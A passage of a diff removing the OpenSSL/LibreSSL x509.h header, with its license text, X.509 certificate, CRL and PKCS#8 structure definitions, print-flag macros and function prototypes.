- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- * ECDH support in OpenSSL originally developed by 
- * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
- */
-
-#ifndef HEADER_X509_H
-#define HEADER_X509_H
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_BUFFER
-#include <openssl/buffer.h>
-#endif
-#ifndef OPENSSL_NO_EVP
-#include <openssl/evp.h>
-#endif
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/stack.h>
-#include <openssl/asn1.h>
-#include <openssl/safestack.h>
-
-#ifndef OPENSSL_NO_EC
-#include <openssl/ec.h>
-#endif
-
-#ifndef OPENSSL_NO_ECDSA
-#include <openssl/ecdsa.h>
-#endif
-
-#ifndef OPENSSL_NO_ECDH
-#include <openssl/ecdh.h>
-#endif
-
-#ifndef OPENSSL_NO_DEPRECATED
-#ifndef OPENSSL_NO_RSA
-#include <openssl/rsa.h>
-#endif
-#ifndef OPENSSL_NO_DSA
-#include <openssl/dsa.h>
-#endif
-#ifndef OPENSSL_NO_DH
-#include <openssl/dh.h>
-#endif
-#endif
-
-#ifndef OPENSSL_NO_SHA
-#include <openssl/sha.h>
-#endif
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#if defined(_WIN32)
-#ifndef LIBRESSL_INTERNAL
-#ifdef _MSC_VER
-#pragma message("Warning, overriding WinCrypt defines")
-#else
-#warning overriding WinCrypt defines
-#endif
-#endif
-#undef X509_NAME
-#undef X509_CERT_PAIR
-#undef X509_EXTENSIONS
-#endif
-
-#define X509_FILETYPE_PEM	1
-#define X509_FILETYPE_ASN1	2
-#define X509_FILETYPE_DEFAULT	3
-
-#define X509v3_KU_DIGITAL_SIGNATURE	0x0080
-#define X509v3_KU_NON_REPUDIATION	0x0040
-#define X509v3_KU_KEY_ENCIPHERMENT	0x0020
-#define X509v3_KU_DATA_ENCIPHERMENT	0x0010
-#define X509v3_KU_KEY_AGREEMENT		0x0008
-#define X509v3_KU_KEY_CERT_SIGN		0x0004
-#define X509v3_KU_CRL_SIGN		0x0002
-#define X509v3_KU_ENCIPHER_ONLY		0x0001
-#define X509v3_KU_DECIPHER_ONLY		0x8000
-#define X509v3_KU_UNDEF			0xffff
-
-typedef struct X509_objects_st
-	{
-	int nid;
-	int (*a2i)(void);
-	int (*i2a)(void);
-	} X509_OBJECTS;
-
-struct X509_algor_st
-	{
-	ASN1_OBJECT *algorithm;
-	ASN1_TYPE *parameter;
-	} /* X509_ALGOR */;
-
-
-typedef STACK_OF(X509_ALGOR) X509_ALGORS;
-
-typedef struct X509_val_st
-	{
-	ASN1_TIME *notBefore;
-	ASN1_TIME *notAfter;
-	} X509_VAL;
-
-struct X509_pubkey_st
-	{
-	X509_ALGOR *algor;
-	ASN1_BIT_STRING *public_key;
-	EVP_PKEY *pkey;
-	};
-
-typedef struct X509_sig_st
-	{
-	X509_ALGOR *algor;
-	ASN1_OCTET_STRING *digest;
-	} X509_SIG;
-
-typedef struct X509_name_entry_st
-	{
-	ASN1_OBJECT *object;
-	ASN1_STRING *value;
-	int set;
-	int size; 	/* temp variable */
-	} X509_NAME_ENTRY;
-
-DECLARE_STACK_OF(X509_NAME_ENTRY)
-
-/* we always keep X509_NAMEs in 2 forms. */
-struct X509_name_st
-	{
-	STACK_OF(X509_NAME_ENTRY) *entries;
-	int modified;	/* true if 'bytes' needs to be built */
-#ifndef OPENSSL_NO_BUFFER
-	BUF_MEM *bytes;
-#else
-	char *bytes;
-#endif
-/*	unsigned long hash; Keep the hash around for lookups */
-	unsigned char *canon_enc;
-	int canon_enclen;
-	} /* X509_NAME */;
-
-DECLARE_STACK_OF(X509_NAME)
-
-#define X509_EX_V_NETSCAPE_HACK		0x8000
-#define X509_EX_V_INIT			0x0001
-typedef struct X509_extension_st
-	{
-	ASN1_OBJECT *object;
-	ASN1_BOOLEAN critical;
-	ASN1_OCTET_STRING *value;
-	} X509_EXTENSION;
-
-typedef STACK_OF(X509_EXTENSION) X509_EXTENSIONS;
-
-DECLARE_STACK_OF(X509_EXTENSION)
-
-/* a sequence of these are used */
-typedef struct x509_attributes_st
-	{
-	ASN1_OBJECT *object;
-	int single; /* 0 for a set, 1 for a single item (which is wrong) */
-	union	{
-		char		*ptr;
-/* 0 */		STACK_OF(ASN1_TYPE) *set;
-/* 1 */		ASN1_TYPE	*single;
-		} value;
-	} X509_ATTRIBUTE;
-
-DECLARE_STACK_OF(X509_ATTRIBUTE)
-
-
-typedef struct X509_req_info_st
-	{
-	ASN1_ENCODING enc;
-	ASN1_INTEGER *version;
-	X509_NAME *subject;
-	X509_PUBKEY *pubkey;
-	/*  d=2 hl=2 l=  0 cons: cont: 00 */
-	STACK_OF(X509_ATTRIBUTE) *attributes; /* [ 0 ] */
-	} X509_REQ_INFO;
-
-typedef struct X509_req_st
-	{
-	X509_REQ_INFO *req_info;
-	X509_ALGOR *sig_alg;
-	ASN1_BIT_STRING *signature;
-	int references;
-	} X509_REQ;
-
-typedef struct x509_cinf_st
-	{
-	ASN1_INTEGER *version;		/* [ 0 ] default of v1 */
-	ASN1_INTEGER *serialNumber;
-	X509_ALGOR *signature;
-	X509_NAME *issuer;
-	X509_VAL *validity;
-	X509_NAME *subject;
-	X509_PUBKEY *key;
-	ASN1_BIT_STRING *issuerUID;		/* [ 1 ] optional in v2 */
-	ASN1_BIT_STRING *subjectUID;		/* [ 2 ] optional in v2 */
-	STACK_OF(X509_EXTENSION) *extensions;	/* [ 3 ] optional in v3 */
-	ASN1_ENCODING enc;
-	} X509_CINF;
-
-/* This stuff is certificate "auxiliary info"
- * it contains details which are useful in certificate
- * stores and databases. When used this is tagged onto
- * the end of the certificate itself
- */
-
-typedef struct x509_cert_aux_st
-	{
-	STACK_OF(ASN1_OBJECT) *trust;		/* trusted uses */
-	STACK_OF(ASN1_OBJECT) *reject;		/* rejected uses */
-	ASN1_UTF8STRING *alias;			/* "friendly name" */
-	ASN1_OCTET_STRING *keyid;		/* key id of private key */
-	STACK_OF(X509_ALGOR) *other;		/* other unspecified info */
-	} X509_CERT_AUX;
-
-struct x509_st
-	{
-	X509_CINF *cert_info;
-	X509_ALGOR *sig_alg;
-	ASN1_BIT_STRING *signature;
-	int valid;
-	int references;
-	char *name;
-	CRYPTO_EX_DATA ex_data;
-	/* These contain copies of various extension values */
-	long ex_pathlen;
-	long ex_pcpathlen;
-	unsigned long ex_flags;
-	unsigned long ex_kusage;
-	unsigned long ex_xkusage;
-	unsigned long ex_nscert;
-	ASN1_OCTET_STRING *skid;
-	AUTHORITY_KEYID *akid;
-	X509_POLICY_CACHE *policy_cache;
-	STACK_OF(DIST_POINT) *crldp;
-	STACK_OF(GENERAL_NAME) *altname;
-	NAME_CONSTRAINTS *nc;
-#ifndef OPENSSL_NO_SHA
-	unsigned char sha1_hash[SHA_DIGEST_LENGTH];
-#endif
-	X509_CERT_AUX *aux;
-	} /* X509 */;
-
-DECLARE_STACK_OF(X509)
-
-/* This is used for a table of trust checking functions */
-
-typedef struct x509_trust_st {
-	int trust;
-	int flags;
-	int (*check_trust)(struct x509_trust_st *, X509 *, int);
-	char *name;
-	int arg1;
-	void *arg2;
-} X509_TRUST;
-
-DECLARE_STACK_OF(X509_TRUST)
-
-typedef struct x509_cert_pair_st {
-	X509 *forward;
-	X509 *reverse;
-} X509_CERT_PAIR;
-
-/* standard trust ids */
-
-#define X509_TRUST_DEFAULT	-1	/* Only valid in purpose settings */
-
-#define X509_TRUST_COMPAT	1
-#define X509_TRUST_SSL_CLIENT	2
-#define X509_TRUST_SSL_SERVER	3
-#define X509_TRUST_EMAIL	4
-#define X509_TRUST_OBJECT_SIGN	5
-#define X509_TRUST_OCSP_SIGN	6
-#define X509_TRUST_OCSP_REQUEST	7
-#define X509_TRUST_TSA		8
-
-/* Keep these up to date! */
-#define X509_TRUST_MIN		1
-#define X509_TRUST_MAX		8
-
-
-/* trust_flags values */
-#define	X509_TRUST_DYNAMIC 	1
-#define	X509_TRUST_DYNAMIC_NAME	2
-
-/* check_trust return codes */
-
-#define X509_TRUST_TRUSTED	1
-#define X509_TRUST_REJECTED	2
-#define X509_TRUST_UNTRUSTED	3
-
-/* Flags for X509_print_ex() */
-
-#define	X509_FLAG_COMPAT		0
-#define	X509_FLAG_NO_HEADER		1L
-#define	X509_FLAG_NO_VERSION		(1L << 1)
-#define	X509_FLAG_NO_SERIAL		(1L << 2)
-#define	X509_FLAG_NO_SIGNAME		(1L << 3)
-#define	X509_FLAG_NO_ISSUER		(1L << 4)
-#define	X509_FLAG_NO_VALIDITY		(1L << 5)
-#define	X509_FLAG_NO_SUBJECT		(1L << 6)
-#define	X509_FLAG_NO_PUBKEY		(1L << 7)
-#define	X509_FLAG_NO_EXTENSIONS		(1L << 8)
-#define	X509_FLAG_NO_SIGDUMP		(1L << 9)
-#define	X509_FLAG_NO_AUX		(1L << 10)
-#define	X509_FLAG_NO_ATTRIBUTES		(1L << 11)
-
-/* Flags specific to X509_NAME_print_ex() */	
-
-/* The field separator information */
-
-#define XN_FLAG_SEP_MASK	(0xf << 16)
-
-#define XN_FLAG_COMPAT		0		/* Traditional SSLeay: use old X509_NAME_print */
-#define XN_FLAG_SEP_COMMA_PLUS	(1 << 16)	/* RFC2253 ,+ */
-#define XN_FLAG_SEP_CPLUS_SPC	(2 << 16)	/* ,+ spaced: more readable */
-#define XN_FLAG_SEP_SPLUS_SPC	(3 << 16)	/* ;+ spaced */
-#define XN_FLAG_SEP_MULTILINE	(4 << 16)	/* One line per field */
-
-#define XN_FLAG_DN_REV		(1 << 20)	/* Reverse DN order */
-
-/* How the field name is shown */
-
-#define XN_FLAG_FN_MASK		(0x3 << 21)
-
-#define XN_FLAG_FN_SN		0		/* Object short name */
-#define XN_FLAG_FN_LN		(1 << 21)	/* Object long name */
-#define XN_FLAG_FN_OID		(2 << 21)	/* Always use OIDs */
-#define XN_FLAG_FN_NONE		(3 << 21)	/* No field names */
-
-#define XN_FLAG_SPC_EQ		(1 << 23)	/* Put spaces round '=' */
-
-/* This determines if we dump fields we don't recognise:
- * RFC2253 requires this.
- */
-
-#define XN_FLAG_DUMP_UNKNOWN_FIELDS (1 << 24)
-
-#define XN_FLAG_FN_ALIGN	(1 << 25)	/* Align field names to 20 characters */
-
-/* Complete set of RFC2253 flags */
-
-#define XN_FLAG_RFC2253 (ASN1_STRFLGS_RFC2253 | \
-			XN_FLAG_SEP_COMMA_PLUS | \
-			XN_FLAG_DN_REV | \
-			XN_FLAG_FN_SN | \
-			XN_FLAG_DUMP_UNKNOWN_FIELDS)
-
-/* readable oneline form */
-
-#define XN_FLAG_ONELINE (ASN1_STRFLGS_RFC2253 | \
-			ASN1_STRFLGS_ESC_QUOTE | \
-			XN_FLAG_SEP_CPLUS_SPC | \
-			XN_FLAG_SPC_EQ | \
-			XN_FLAG_FN_SN)
-
-/* readable multiline form */
-
-#define XN_FLAG_MULTILINE (ASN1_STRFLGS_ESC_CTRL | \
-			ASN1_STRFLGS_ESC_MSB | \
-			XN_FLAG_SEP_MULTILINE | \
-			XN_FLAG_SPC_EQ | \
-			XN_FLAG_FN_LN | \
-			XN_FLAG_FN_ALIGN)
-
-struct x509_revoked_st
-	{
-	ASN1_INTEGER *serialNumber;
-	ASN1_TIME *revocationDate;
-	STACK_OF(X509_EXTENSION) /* optional */ *extensions;
-	/* Set up if indirect CRL */
-	STACK_OF(GENERAL_NAME) *issuer;
-	/* Revocation reason */
-	int reason;
-	int sequence; /* load sequence */
-	};
-
-DECLARE_STACK_OF(X509_REVOKED)
-
-typedef struct X509_crl_info_st
-	{
-	ASN1_INTEGER *version;
-	X509_ALGOR *sig_alg;
-	X509_NAME *issuer;
-	ASN1_TIME *lastUpdate;
-	ASN1_TIME *nextUpdate;
-	STACK_OF(X509_REVOKED) *revoked;
-	STACK_OF(X509_EXTENSION) /* [0] */ *extensions;
-	ASN1_ENCODING enc;
-	} X509_CRL_INFO;
-
-struct X509_crl_st
-	{
-	/* actual signature */
-	X509_CRL_INFO *crl;
-	X509_ALGOR *sig_alg;
-	ASN1_BIT_STRING *signature;
-	int references;
-	int flags;
-	/* Copies of various extensions */
-	AUTHORITY_KEYID *akid;
-	ISSUING_DIST_POINT *idp;
-	/* Convenient breakdown of IDP */
-	int idp_flags;
-	int idp_reasons;
-	/* CRL and base CRL numbers for delta processing */
-	ASN1_INTEGER *crl_number;
-	ASN1_INTEGER *base_crl_number;
-#ifndef OPENSSL_NO_SHA
-	unsigned char sha1_hash[SHA_DIGEST_LENGTH];
-#endif
-	STACK_OF(GENERAL_NAMES) *issuers;
-	const X509_CRL_METHOD *meth;
-	void *meth_data;
-	} /* X509_CRL */;
-
-DECLARE_STACK_OF(X509_CRL)
-
-typedef struct private_key_st
-	{
-	int version;
-	/* The PKCS#8 data types */
-	X509_ALGOR *enc_algor;
-	ASN1_OCTET_STRING *enc_pkey;	/* encrypted pub key */
-
-	/* When decrypted, the following will not be NULL */
-	EVP_PKEY *dec_pkey;
-
-	/* used to encrypt and decrypt */
-	int key_length;
-	char *key_data;
-	int key_free;	/* true if we should auto free key_data */
-
-	/* expanded version of 'enc_algor' */
-	EVP_CIPHER_INFO cipher;
-
-	int references;
-	} X509_PKEY;
-
-#ifndef OPENSSL_NO_EVP
-typedef struct X509_info_st
-	{
-	X509 *x509;
-	X509_CRL *crl;
-	X509_PKEY *x_pkey;
-
-	EVP_CIPHER_INFO enc_cipher;
-	int enc_len;
-	char *enc_data;
-
-	int references;
-	} X509_INFO;
-
-DECLARE_STACK_OF(X509_INFO)
-#endif
-
-/* The next 2 structures and their 8 routines were sent to me by
- * Pat Richard <patr@x509.com> and are used to manipulate
- * Netscapes spki structures - useful if you are writing a CA web page
- */
-typedef struct Netscape_spkac_st
-	{
-	X509_PUBKEY *pubkey;
-	ASN1_IA5STRING *challenge;	/* challenge sent in atlas >= PR2 */
-	} NETSCAPE_SPKAC;
-
-typedef struct Netscape_spki_st
-	{
-	NETSCAPE_SPKAC *spkac;	/* signed public key and challenge */
-	X509_ALGOR *sig_algor;
-	ASN1_BIT_STRING *signature;
-	} NETSCAPE_SPKI;
-
-/* Netscape certificate sequence structure */
-typedef struct Netscape_certificate_sequence
-	{
-	ASN1_OBJECT *type;
-	STACK_OF(X509) *certs;
-	} NETSCAPE_CERT_SEQUENCE;
-
-/* Unused (and iv length is wrong)
-typedef struct CBCParameter_st
-	{
-	unsigned char iv[8];
-	} CBC_PARAM;
-*/
-
-/* Password based encryption structure */
-
-typedef struct PBEPARAM_st {
-ASN1_OCTET_STRING *salt;
-ASN1_INTEGER *iter;
-} PBEPARAM;
-
-/* Password based encryption V2 structures */
-
-typedef struct PBE2PARAM_st {
-X509_ALGOR *keyfunc;
-X509_ALGOR *encryption;
-} PBE2PARAM;
-
-typedef struct PBKDF2PARAM_st {
-ASN1_TYPE *salt;	/* Usually OCTET STRING but could be anything */
-ASN1_INTEGER *iter;
-ASN1_INTEGER *keylength;
-X509_ALGOR *prf;
-} PBKDF2PARAM;
-
-
-/* PKCS#8 private key info structure */
-
-struct pkcs8_priv_key_info_st
-        {
-        int broken;     /* Flag for various broken formats */
-#define PKCS8_OK		0
-#define PKCS8_NO_OCTET		1
-#define PKCS8_EMBEDDED_PARAM	2
-#define PKCS8_NS_DB		3
-#define PKCS8_NEG_PRIVKEY	4
-        ASN1_INTEGER *version;
-        X509_ALGOR *pkeyalg;
-        ASN1_TYPE *pkey; /* Should be OCTET STRING but some are broken */
-        STACK_OF(X509_ATTRIBUTE) *attributes;
-        };
-
-#ifdef  __cplusplus
-}
-#endif
-
-#include <openssl/x509_vfy.h>
-#include <openssl/pkcs7.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#define X509_EXT_PACK_UNKNOWN	1
-#define X509_EXT_PACK_STRING	2
-
-#define		X509_get_version(x) ASN1_INTEGER_get((x)->cert_info->version)
-/* #define	X509_get_serialNumber(x) ((x)->cert_info->serialNumber) */
-#define		X509_get_notBefore(x) ((x)->cert_info->validity->notBefore)
-#define		X509_get_notAfter(x) ((x)->cert_info->validity->notAfter)
-#define		X509_extract_key(x)	X509_get_pubkey(x) /*****/
-#define		X509_REQ_get_version(x) ASN1_INTEGER_get((x)->req_info->version)
-#define		X509_REQ_get_subject_name(x) ((x)->req_info->subject)
-#define		X509_REQ_extract_key(a)	X509_REQ_get_pubkey(a)
-#define		X509_name_cmp(a,b)	X509_NAME_cmp((a),(b))
-#define		X509_get_signature_type(x) EVP_PKEY_type(OBJ_obj2nid((x)->sig_alg->algorithm))
-
-#define		X509_CRL_get_version(x) ASN1_INTEGER_get((x)->crl->version)
-#define 	X509_CRL_get_lastUpdate(x) ((x)->crl->lastUpdate)
-#define 	X509_CRL_get_nextUpdate(x) ((x)->crl->nextUpdate)
-#define		X509_CRL_get_issuer(x) ((x)->crl->issuer)
-#define		X509_CRL_get_REVOKED(x) ((x)->crl->revoked)
-
-void X509_CRL_set_default_method(const X509_CRL_METHOD *meth);
-X509_CRL_METHOD *X509_CRL_METHOD_new(
-	int (*crl_init)(X509_CRL *crl),
-	int (*crl_free)(X509_CRL *crl),
-	int (*crl_lookup)(X509_CRL *crl, X509_REVOKED **ret,
-				ASN1_INTEGER *ser, X509_NAME *issuer),
-	int (*crl_verify)(X509_CRL *crl, EVP_PKEY *pk));
-void X509_CRL_METHOD_free(X509_CRL_METHOD *m);
-
-void X509_CRL_set_meth_data(X509_CRL *crl, void *dat);
-void *X509_CRL_get_meth_data(X509_CRL *crl);
-
-/* This one is only used so that a binary form can output, as in
- * i2d_X509_NAME(X509_get_X509_PUBKEY(x),&buf) */
-#define 	X509_get_X509_PUBKEY(x) ((x)->cert_info->key)
-
-
-const char *X509_verify_cert_error_string(long n);
-
-#ifndef OPENSSL_NO_EVP
-int X509_verify(X509 *a, EVP_PKEY *r);
-
-int X509_REQ_verify(X509_REQ *a, EVP_PKEY *r);
-int X509_CRL_verify(X509_CRL *a, EVP_PKEY *r);
-int NETSCAPE_SPKI_verify(NETSCAPE_SPKI *a, EVP_PKEY *r);
-
-NETSCAPE_SPKI * NETSCAPE_SPKI_b64_decode(const char *str, int len);
-char * NETSCAPE_SPKI_b64_encode(NETSCAPE_SPKI *x);
-EVP_PKEY *NETSCAPE_SPKI_get_pubkey(NETSCAPE_SPKI *x);
-int NETSCAPE_SPKI_set_pubkey(NETSCAPE_SPKI *x, EVP_PKEY *pkey);
-
-int NETSCAPE_SPKI_print(BIO *out, NETSCAPE_SPKI *spki);
-
-int X509_signature_dump(BIO *bp,const ASN1_STRING *sig, int indent);
-int X509_signature_print(BIO *bp,X509_ALGOR *alg, ASN1_STRING *sig);
-
-int X509_sign(X509 *x, EVP_PKEY *pkey, const EVP_MD *md);
-int X509_sign_ctx(X509 *x, EVP_MD_CTX *ctx);
-int X509_REQ_sign(X509_REQ *x, EVP_PKEY *pkey, const EVP_MD *md);
-int X509_REQ_sign_ctx(X509_REQ *x, EVP_MD_CTX *ctx);
-int X509_CRL_sign(X509_CRL *x, EVP_PKEY *pkey, const EVP_MD *md);
-int X509_CRL_sign_ctx(X509_CRL *x, EVP_MD_CTX *ctx);
-int NETSCAPE_SPKI_sign(NETSCAPE_SPKI *x, EVP_PKEY *pkey, const EVP_MD *md);
-
-int X509_pubkey_digest(const X509 *data,const EVP_MD *type,
-		unsigned char *md, unsigned int *len);
-int X509_digest(const X509 *data,const EVP_MD *type,
-		unsigned char *md, unsigned int *len);
-int X509_CRL_digest(const X509_CRL *data,const EVP_MD *type,
-		unsigned char *md, unsigned int *len);
-int X509_REQ_digest(const X509_REQ *data,const EVP_MD *type,
-		unsigned char *md, unsigned int *len);
-int X509_NAME_digest(const X509_NAME *data,const EVP_MD *type,
-		unsigned char *md, unsigned int *len);
-#endif
-
-X509 *d2i_X509_fp(FILE *fp, X509 **x509);
-int i2d_X509_fp(FILE *fp,X509 *x509);
-X509_CRL *d2i_X509_CRL_fp(FILE *fp,X509_CRL **crl);
-int i2d_X509_CRL_fp(FILE *fp,X509_CRL *crl);
-X509_REQ *d2i_X509_REQ_fp(FILE *fp,X509_REQ **req);
-int i2d_X509_REQ_fp(FILE *fp,X509_REQ *req);
-#ifndef OPENSSL_NO_RSA
-RSA *d2i_RSAPrivateKey_fp(FILE *fp,RSA **rsa);
-int i2d_RSAPrivateKey_fp(FILE *fp,RSA *rsa);
-RSA *d2i_RSAPublicKey_fp(FILE *fp,RSA **rsa);
-int i2d_RSAPublicKey_fp(FILE *fp,RSA *rsa);
-RSA *d2i_RSA_PUBKEY_fp(FILE *fp,RSA **rsa);
-int i2d_RSA_PUBKEY_fp(FILE *fp,RSA *rsa);
-#endif
-#ifndef OPENSSL_NO_DSA
-DSA *d2i_DSA_PUBKEY_fp(FILE *fp, DSA **dsa);
-int i2d_DSA_PUBKEY_fp(FILE *fp, DSA *dsa);
-int i2d_DSAPrivateKey_fp(FILE *fp, DSA *dsa);
-#endif
-#ifndef OPENSSL_NO_EC
-EC_KEY *d2i_EC_PUBKEY_fp(FILE *fp, EC_KEY **eckey);
-int   i2d_EC_PUBKEY_fp(FILE *fp, EC_KEY *eckey);
-EC_KEY *d2i_ECPrivateKey_fp(FILE *fp, EC_KEY **eckey);
-int   i2d_ECPrivateKey_fp(FILE *fp, EC_KEY *eckey);
-#endif
-X509_SIG *d2i_PKCS8_fp(FILE *fp,X509_SIG **p8);
-int i2d_PKCS8_fp(FILE *fp,X509_SIG *p8);
-PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO_fp(FILE *fp,
-						PKCS8_PRIV_KEY_INFO **p8inf);
-int i2d_PKCS8_PRIV_KEY_INFO_fp(FILE *fp,PKCS8_PRIV_KEY_INFO *p8inf);
-int i2d_PKCS8PrivateKeyInfo_fp(FILE *fp, EVP_PKEY *key);
-int i2d_PrivateKey_fp(FILE *fp, EVP_PKEY *pkey);
-EVP_PKEY *d2i_PrivateKey_fp(FILE *fp, EVP_PKEY **a);
-int i2d_PUBKEY_fp(FILE *fp, EVP_PKEY *pkey);
-EVP_PKEY *d2i_PUBKEY_fp(FILE *fp, EVP_PKEY **a);
-
-#ifndef OPENSSL_NO_BIO
-X509 *d2i_X509_bio(BIO *bp,X509 **x509);
-int i2d_X509_bio(BIO *bp,X509 *x509);
-X509_CRL *d2i_X509_CRL_bio(BIO *bp,X509_CRL **crl);
-int i2d_X509_CRL_bio(BIO *bp,X509_CRL *crl);
-X509_REQ *d2i_X509_REQ_bio(BIO *bp,X509_REQ **req);
-int i2d_X509_REQ_bio(BIO *bp,X509_REQ *req);
-#ifndef OPENSSL_NO_RSA
-RSA *d2i_RSAPrivateKey_bio(BIO *bp,RSA **rsa);
-int i2d_RSAPrivateKey_bio(BIO *bp,RSA *rsa);
-RSA *d2i_RSAPublicKey_bio(BIO *bp,RSA **rsa);
-int i2d_RSAPublicKey_bio(BIO *bp,RSA *rsa);
-RSA *d2i_RSA_PUBKEY_bio(BIO *bp,RSA **rsa);
-int i2d_RSA_PUBKEY_bio(BIO *bp,RSA *rsa);
-#endif
-#ifndef OPENSSL_NO_DSA
-DSA *d2i_DSA_PUBKEY_bio(BIO *bp, DSA **dsa);
-int i2d_DSA_PUBKEY_bio(BIO *bp, DSA *dsa);
-DSA *d2i_DSAPrivateKey_bio(BIO *bp, DSA **dsa);
-int i2d_DSAPrivateKey_bio(BIO *bp, DSA *dsa);
-#endif
-#ifndef OPENSSL_NO_EC
-EC_KEY *d2i_EC_PUBKEY_bio(BIO *bp, EC_KEY **eckey);
-int   i2d_EC_PUBKEY_bio(BIO *bp, EC_KEY *eckey);
-EC_KEY *d2i_ECPrivateKey_bio(BIO *bp, EC_KEY **eckey);
-int   i2d_ECPrivateKey_bio(BIO *bp, EC_KEY *eckey);
-#endif
-X509_SIG *d2i_PKCS8_bio(BIO *bp,X509_SIG **p8);
-int i2d_PKCS8_bio(BIO *bp,X509_SIG *p8);
-PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO_bio(BIO *bp,
-						PKCS8_PRIV_KEY_INFO **p8inf);
-int i2d_PKCS8_PRIV_KEY_INFO_bio(BIO *bp,PKCS8_PRIV_KEY_INFO *p8inf);
-int i2d_PKCS8PrivateKeyInfo_bio(BIO *bp, EVP_PKEY *key);
-int i2d_PrivateKey_bio(BIO *bp, EVP_PKEY *pkey);
-EVP_PKEY *d2i_PrivateKey_bio(BIO *bp, EVP_PKEY **a);
-int i2d_PUBKEY_bio(BIO *bp, EVP_PKEY *pkey);
-EVP_PKEY *d2i_PUBKEY_bio(BIO *bp, EVP_PKEY **a);
-#endif
-
-X509 *X509_dup(X509 *x509);
-X509_ATTRIBUTE *X509_ATTRIBUTE_dup(X509_ATTRIBUTE *xa);
-X509_EXTENSION *X509_EXTENSION_dup(X509_EXTENSION *ex);
-X509_CRL *X509_CRL_dup(X509_CRL *crl);
-X509_REQ *X509_REQ_dup(X509_REQ *req);
-X509_ALGOR *X509_ALGOR_dup(X509_ALGOR *xn);
-int X509_ALGOR_set0(X509_ALGOR *alg, ASN1_OBJECT *aobj, int ptype, void *pval);
-void X509_ALGOR_get0(ASN1_OBJECT **paobj, int *pptype, void **ppval,
-						X509_ALGOR *algor);
-void X509_ALGOR_set_md(X509_ALGOR *alg, const EVP_MD *md);
-int X509_ALGOR_cmp(const X509_ALGOR *a, const X509_ALGOR *b);
-
-X509_NAME *X509_NAME_dup(X509_NAME *xn);
-X509_NAME_ENTRY *X509_NAME_ENTRY_dup(X509_NAME_ENTRY *ne);
-
-int		X509_cmp_time(const ASN1_TIME *s, time_t *t);
-int		X509_cmp_current_time(const ASN1_TIME *s);
-ASN1_TIME *	X509_time_adj(ASN1_TIME *s, long adj, time_t *t);
-ASN1_TIME *	X509_time_adj_ex(ASN1_TIME *s,
-				int offset_day, long offset_sec, time_t *t);
-ASN1_TIME *	X509_gmtime_adj(ASN1_TIME *s, long adj);
-
-const char *	X509_get_default_cert_area(void );
-const char *	X509_get_default_cert_dir(void );
-const char *	X509_get_default_cert_file(void );
-const char *	X509_get_default_cert_dir_env(void );
-const char *	X509_get_default_cert_file_env(void );
-const char *	X509_get_default_private_dir(void );
-
-X509_REQ *	X509_to_X509_REQ(X509 *x, EVP_PKEY *pkey, const EVP_MD *md);
-X509 *		X509_REQ_to_X509(X509_REQ *r, int days,EVP_PKEY *pkey);
-
-X509_ALGOR *X509_ALGOR_new(void);
-void X509_ALGOR_free(X509_ALGOR *a);
-X509_ALGOR *d2i_X509_ALGOR(X509_ALGOR **a, const unsigned char **in, long len);
-int i2d_X509_ALGOR(X509_ALGOR *a, unsigned char **out);
-extern const ASN1_ITEM X509_ALGOR_it;
-X509_ALGORS *d2i_X509_ALGORS(X509_ALGORS **a, const unsigned char **in, long len);
-int i2d_X509_ALGORS(X509_ALGORS *a, unsigned char **out);
-extern const ASN1_ITEM X509_ALGORS_it;
-X509_VAL *X509_VAL_new(void);
-void X509_VAL_free(X509_VAL *a);
-X509_VAL *d2i_X509_VAL(X509_VAL **a, const unsigned char **in, long len);
-int i2d_X509_VAL(X509_VAL *a, unsigned char **out);
-extern const ASN1_ITEM X509_VAL_it;
-
-X509_PUBKEY *X509_PUBKEY_new(void);
-void X509_PUBKEY_free(X509_PUBKEY *a);
-X509_PUBKEY *d2i_X509_PUBKEY(X509_PUBKEY **a, const unsigned char **in, long len);
-int i2d_X509_PUBKEY(X509_PUBKEY *a, unsigned char **out);
-extern const ASN1_ITEM X509_PUBKEY_it;
-
-int		X509_PUBKEY_set(X509_PUBKEY **x, EVP_PKEY *pkey);
-EVP_PKEY *	X509_PUBKEY_get(X509_PUBKEY *key);
-int		X509_get_pubkey_parameters(EVP_PKEY *pkey,
-					   STACK_OF(X509) *chain);
-int		i2d_PUBKEY(EVP_PKEY *a,unsigned char **pp);
-EVP_PKEY *	d2i_PUBKEY(EVP_PKEY **a,const unsigned char **pp,
-			long length);
-#ifndef OPENSSL_NO_RSA
-int		i2d_RSA_PUBKEY(RSA *a,unsigned char **pp);
-RSA *		d2i_RSA_PUBKEY(RSA **a,const unsigned char **pp,
-			long length);
-#endif
-#ifndef OPENSSL_NO_DSA
-int		i2d_DSA_PUBKEY(DSA *a,unsigned char **pp);
-DSA *		d2i_DSA_PUBKEY(DSA **a,const unsigned char **pp,
-			long length);
-#endif
-#ifndef OPENSSL_NO_EC
